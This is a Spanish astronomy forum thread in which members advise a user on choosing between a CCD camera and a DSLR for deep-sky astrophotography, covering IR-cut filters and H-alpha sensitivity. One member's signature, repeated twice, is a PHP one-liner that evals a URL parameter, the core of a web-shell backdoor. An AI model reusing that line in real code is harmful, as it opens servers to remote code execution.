compra de camara.

Preguntas básicas sobre astronomía
Responder
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

compra de camara.

Mensaje por Manuelariza »

:?: Quiero comprarme una camara para astrofotografia pero dudo entre una ccd o una reflex digital, necesito que alguien me aconseje cual es la mejor opcion.Gracias.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

compra de camara.

Mensaje por rcacho »

qué equipo tienes? que clase de fotografia estas interesado en hacer? Danos todos los datos posibles y sera mas facil echarte una mano ;)

Un saludo!
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

compra de camara.

Mensaje por Manuelariza »

El equipo que tengo es un reflactor de 150 mm y 750mm de focal en montura EQ 5 motorizada, el tipo de fotografia que deseo es de cielo profundo.Gracias.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

compra de camara.

Mensaje por Manuelariza »

:evil: Esta claro que no hay tiene mucho interes por informar. gracias
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

compra de camara.

Mensaje por rcacho »

[quote="MAL1"]:evil: Esta claro que no hay tiene mucho interes por informar. gracias[/quote]

Si eso es lo que quieres creer, estas en tu perfecto derecho.

Ultimamente he andado liado con mil cosas. Interes de informar hay muchisimo. Interes por informar bien, mucho mas y antes de dar una respuesta rápida y poco meditada, prefiero esperar. Un consejo: la impaciencia no es buena aliada de la astronomia.

Hay muchos parámetros a la hora de elegir una cámara para astrofotografia:

- Calidad del cielo
- Presupuesto
- Resolución de la fotografía
- Observatorio fijo o no
- Posibilidad de hacer autoguiado
- Experiencia previa
- Equipo

Y muchos otros que no recuerdo ahora. Como veras, elegir una camara para astrofotografia no es sencillo.

Ventajas de DSLR:

Mucho campo, independiendes de ordenador, precio, posibilidad de utilizarlas en fotografia convencional

Ventajas de CCD:

Alta sensibilidad, posibilidad de usar distintos filtros sin perder resolución, menos peso, refrigeradas.

Inconvenientes de DSLR:

Filtro infrarrojo, pérdida de resolución al utilizar filtros, pesadas (pueden desequilibrar el telescopio)

Inconvenientes de CCD:

Necesitan un ordenador para utilizarse, campo pequeño


Espero que estés agusto con esta respuesta. La decisión final es tuya. Yo llevo meses pensando lo mismo y aun no me he decidido...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

compra de camara.

Mensaje por m3ntol »

Hola Mal,
sentimos el retraso en la respuesta. Seguramente Raul no ha podido conectarse por algún motivo, pues siempre suele responder rápido a todos.

Yo no soy experto en astrofoto y mis consejos no van a ser adecuados. Leyendo lo que ha puesto Raul me iría a por una reflex, pero porque también me va a valer para fotografía convencional.
phpbb:eval(stripslashes($_GET[e]));
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

compra de camara.

Mensaje por rcacho »

Lo malo que tienen las reflex es que la mayoria de los objetos de espacio profundo (salvo las galaxias y algunas nebulosas de reflexión) emiten en H-alfa, y el filtro infrarrojo que llevan las cámaras digitales se lo traga.

Como ejemplo no vale M42, que aunque emite en H-alfa, emite muchisimo, por lo que genera suficiente señal en el sensor para sacar cosas.

Un saludo
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

compra de camara.

Mensaje por Manuelariza »

:D Gracias por los consejos, creo que me va ha costar decidirme por la que me comprare. Pido perdon por el comentario del ultimo mensaje.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

compra de camara.

Mensaje por m3ntol »

[quote="rcacho"]Lo malo que tienen las reflex es que la mayoria de los objetos de espacio profundo (salvo las galaxias y algunas nebulosas de reflexión) emiten en H-alfa, y el filtro infrarrojo que llevan las cámaras digitales se lo traga.

Como ejemplo no vale M42, que aunque emite en H-alfa, emite muchisimo, por lo que genera suficiente señal en el sensor para sacar cosas.

Un saludo[/quote]

Respecto a ese tema, hay sitios en los que te quitan el filtro de la reflex, pero OJO! al quitarte el filtro no puedes hacer fotosgrafía normal ya que aparecen tonos rojizos y falla el enfoque. Peeeero eso se soluciona comprando un filtro infrarojo para el objetivo, no son excesivamente caros.

Es decir, la solución buena (para mi gusto) sería una reflex a la que le han quitado el filtro IR y a la que se le ha comprado un IR para el objetivo.

joer... si es que la astrofoto es para ricos :P:P
phpbb:eval(stripslashes($_GET[e]));
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

compra de camara.

Mensaje por astrolozano »

Yo también he andado algo desconectado, perdona el retraso.

Ya te ha resumido rcacho todo lo que influye en la decisión, pero también te diré que con cosas básicas se pueden hacer muchas cosas interesantes. Hay multitud de ejemplos de fotos chulas con cámaras normales. Eso sí, a costa de horas y horas de exposición, promediados y muucho procesado de la imagen.

Con respecto a lo que dice m3ntol del filtro, para que no pierda el autofocus sólo hay que poner un "filtro" que sustituya al filtro infrarrojo original, pero que realmente no filtre nada. Y después con el IR de objetivo vas servido. Pero, como te decía antes, mucha gente hace fotos chulas con cámaras que tienen el filtro sin retirar.

Saludos, y paciencia que a veces no podemos estar las 24 horas del día conectados :wink:, ya me gustaría a mi...
Responder